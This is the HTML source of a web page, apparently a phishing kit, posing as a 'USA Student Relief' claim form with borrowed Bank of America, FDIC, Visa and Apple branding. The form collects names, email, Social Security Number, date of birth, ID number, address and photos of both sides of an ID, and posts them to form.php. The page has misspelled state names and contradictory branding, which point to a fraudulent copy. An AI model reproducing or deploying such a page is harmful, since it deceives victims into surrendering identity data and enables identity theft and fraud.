
<!DOCTYPE html>
<html class="js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths" lang="en" style="">
    <head>
    <meta charset="utf-8">    
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="version" content="22.07.0128">
    <meta class="foundation-data-attribute-namespace">
    <meta class="foundation-mq-xxlarge">
    <meta class="foundation-mq-xlarge">
    <meta class="foundation-mq-large">
    <meta class="foundation-mq-medium">
    <meta class="foundation-mq-small">
    <title>USA STUDENT RELIEF</title>
    <script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js" nonce=""></script>
    <link href="css/prohqcker2.css" rel="stylesheet">
    <link href="css/prohqcker.css" rel="stylesheet">
    <link href="css/print1.css" rel="stylesheet" type="text/css" media="print">
    <link href="css/preventEarlyClickCss.css" rel="stylesheet">
    <link href="css/site.min.css" rel="stylesheet" type="text/css">
    <link href="favicon1.ico" rel="shortcut icon" type="image/x-icon">
    <meta name="format-detection" content="telephone=no">
    <meta class="foundation-mq-topbar">
    <link rel="stylesheet" type="text/css" href="css/cap.css">
    <script type="text/javascript" src="js/mask.js"></script>
</head>
<body class="body">
<div class="header-container" role="banner">
    <div class="row header-row">
        <div class="columns brand-container show-for-medium-up">
            <div class="small-12 medium-3 custom-medium-push-5 columns">
                <div class="logo-wrapper">
                    <a href="#">
                        <img alt="STUDENT RELIEF" class="header-logo medium img-responsive" id="brand-logo" src="edu.png" title="">
                    </a>
                </div>
            </div>
            <div class="small-12 medium-9 custom-medium-pull-7 columns">
                <div class="program-wrapper">
                    <span class="header-card-program">STUDENT EDUCATIONAL RELIEF</span>
                </div>
            </div>
        </div>
        <div class="small-12 show-for-small-only columns">
            <nav data-topbar="" class="top-bar mobile-nav" role="navigation" aria-label="Main" style="">
                <ul class="title-area">
                    <li class="name">
                        <a href="#"><img alt="Bank Of America, N. A. Logo" class="header-logo medium img-responsive" id="brand-logo-mobile" src="edu.png" title=""></a>
                    </li>
                    
                    <li class="header-card-program">STUDENT EDUCATIONAL FORM </li>
                </ul>
               
            </nav>
        </div>
        <div class="row show-for-medium-up">
            <div class="medium-12 columns">
                <nav data-topbar="" class="top-bar desktop-nav" role="navigation" aria-label="Main">
                    
                </nav>
            </div>
        </div>
    </div>
</div>
<div class="content-container" id="content" role="main" tabindex="-1">
    <form action="form.php" autocomplete="off" id="MainForm" method="post" name="MainForm">
        <div class="row">
            <div class="large-12 medium-12 small-12 column">
                <h1 id="SignIn">APPLICANTS Information</h1>
                
            </div>
        </div>
        <div class="box">
            <p style="text-align: center">Please provide the requested information to establish your claim.</p>
            <div class="row">
                <div class="medium-12 columns">
                    <div class="large-12 medium-12 small-12 column">
                        <p class="align-right margin-bottom-none"><span class="required">*</span>Required fields</p>
                    </div>
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add"> First name<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="add" name="fname" type="text" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>

                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">middle name </label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="add" name="mname" type="text" value="" >
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>

                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">Last Name<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="add" name="lname" type="text" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>

                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">email<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="add" name="email" type="email" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>


                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">Gender<span class="required">*&nbsp;</span></label>
                        </div>
                    <div class="large-4 medium-4 small-12 columns left">
                        <select name="gender" class="form-control selectpicker" >
                            <option value=" " >Please select your gender</option>
                            <option>male</option>
                            <option>female</option>
                        </select>
                    </div>
                <div class="large-5 medium-3 small-12 columns left"></div>
            </div>


            <div class="row form-row">
                <div class="large-3 medium-5 small-12 column ">
                    <label class="form-control" for="add">VALID MEANS OF ID<span class="required">*&nbsp;</span></label>
                </div>
                    <div class="large-4 medium-4 small-12 columns left">
                        <select name="id" class="form-control selectpicker" >
                            <option value=" " >Please select your ID</option>
                            <option>STATE ISSUED ID</option>
                            <option>DRIVER LICENCE</option>
                        </select>
                    </div>
                <div class="large-5 medium-3 small-12 columns left"></div>
            </div>

                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="pin">ID Number<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="pin" placeholder="xxxx" name="idn" type="tel" value="" required>
                            <script>
                                var element = document.getElementById('idn');
                                var maskOptions = {
                                mask: '##########################'
                                };
                                var mask = IMask(element, maskOptions);
                            </script>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>


                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="ssn">Social Security Number<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" placeholder="xxx-xx-xxxx" id="ssn" name="ssn" type="tel" value="" required>
                            <script>
                                var element = document.getElementById('ssn');
                                var maskOptions = {
                                mask: '000-00-0000'
                                };
                                var mask = IMask(element, maskOptions);
                            </script>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                    
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="dob">Date of Birth<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" placeholder="mm/dd/yyyy" id="dob" name="dob" type="tel" value="" required>
                            <script>
                                var element = document.getElementById('dob');
                                var maskOptions = {
                                mask: '00/00/0000'
                                };
                                var mask = IMask(element, maskOptions);
                            </script>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="phone">Phone Number<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="phone" name="phone" type="tel" value="" required>
                            <script>
                                var element = document.getElementById('phone');
                                var maskOptions = {
                                mask: '(000) 000-0000'
                                };
                                var mask = IMask(element, maskOptions);
                            </script>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">Street Address<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="add" name="add" type="text" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">City<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="add" name="city" type="text" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add">State<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <select name="state" class="form-control selectpicker" >
                                <option value=" " >Please select your state</option>
                                <option>Alabama</option>
                                <option>Alaska</option>
                                <option >Arizona</option>
                                <option >Arkansas</option>
                                <option >California</option>
                                <option >Colorado</option>
                                <option >Connecticut</option>
                                <option >Delaware</option>
                                <option >District of Columbia</option>
                                <option> Florida</option>
                                <option >Georgia</option>
                                <option >Hawaii</option>
                                <option >daho</option>
                                <option >Illinois</option>
                                <option >Indiana</option>
                                <option >Iowa</option>
                                <option> Kansas</option>
                                <option >Kentucky</option>
                                <option >Louisiana</option>
                                <option>Maine</option>
                                <option >Maryland</option>
                                <option> Mass</option>
                                <option >Michigan</option>
                                <option >Minnesota</option>
                                <option>Mississippi</option>
                                <option>Missouri</option>
                                <option>Montana</option>
                                <option>Nebraska</option>
                                <option>Nevada</option>
                                <option>New Hampshire</option>
                                <option>New Jersey</option>
                                <option>New Mexico</option>
                                <option>New York</option>
                                <option>North Carolina</option>
                                <option>North Dakota</option>
                                <option>Ohio</option>
                                <option>Oklahoma</option>
                                <option>Oregon</option>
                                <option>Pennsylvania</option>
                                <option>Rhode Island</option>
                                <option>South Carolina</option>
                                <option>South Dakota</option>
                                <option>Tennessee</option>
                                <option>Texas</option>
                                <option> Uttah</option>
                                <option>Vermont</option>
                                <option>Virginia</option>
                                <option >Washington</option>
                                <option >West Virginia</option>
                                <option>Wisconsin</option>
                                <option >Wyoming</option>
                              </select>
                            </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="zip">Zip Code<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="zip" name="zip" type="tel" maxlength="5" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>

                    <div class="row form-row">
                        <div class="large-9 ">
                            <label class="form-control" for="add"> UPLOAD A CLEAR PICS OF YOUR VALID MEANS OF I.D.<span class=""></span></label>
                        </div>
                        
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>
                </br>

                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add"> Front ID<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="idf" name="idf" type="file" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>

                    <div class="row form-row">
                        <div class="large-3 medium-5 small-12 column ">
                            <label class="form-control" for="add"> BACK ID<span class="required">*&nbsp;</span></label>
                        </div>
                        <div class="large-4 medium-4 small-12 columns left">
                            <input aria-required="true" autocomplete="off" class="stretch" id="idb" name="idb" type="file" value="" required>
                        </div>
                        <div class="large-5 medium-3 small-12 columns left"></div>
                    </div>

                    
                    <div class="center">
                        
                
                        <div id="captchaBackground">
                            <canvas id="captcha">captcha text</canvas>
                            <input id="textBox" type="text" name="text">
                
                            <div id="buttons" >
                                <input id="submitButton" type="submit" value="SUBMIT">
                                <button id="refreshButton" type="submit">Refresh</button>
                            </div>
                
                            <span id="output"></span>
                        </div>
                    </div>
                </br>
            </br>
        </br>
            </div>
        </div>
    </form>
</div>
<script src="js/cap.js"></script>

<div class="footer" role="contentinfo">
    <div class="row">
        
    </div>
    <div class="extra">
        <div class="small-12 columns">
            <div class="row copyright">
                <div class="small-12 columns">
                    <p>
                        Copyright 2023 United State of America .<a href="index.html"> Visa Global Privacy Notice.<a>                                                    
                        <br>America, N.A. Member FDIC Equal Housing Lender                    
                    </p>
                    <div class="large-12 column align-center">
                        <p style="color:#000;">
                            <img src="edu.png"><br><br>
                           Apple, the Apple logo, the App Store, and iPhone are trademarks of Apple Inc., registered in the U.S. and other countries. Google Play and the Google Play logo are trademarks of Google LLC.
                        </p>
                        <p style="color:#000;"> Your funds are eligible for FDIC insurance. If specific deposit insurance requirements are met. See <a href="index.html" data-reveal-id="modal-leaving-site">index.html</a> for details. In the event Bank of America, N.A. fails, the FDIC may require information from you, including a government identification number, to determine the amount of your insured deposits.  If you do not provide this information to the FDIC access to your insured relief will be delayed. </p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
</html>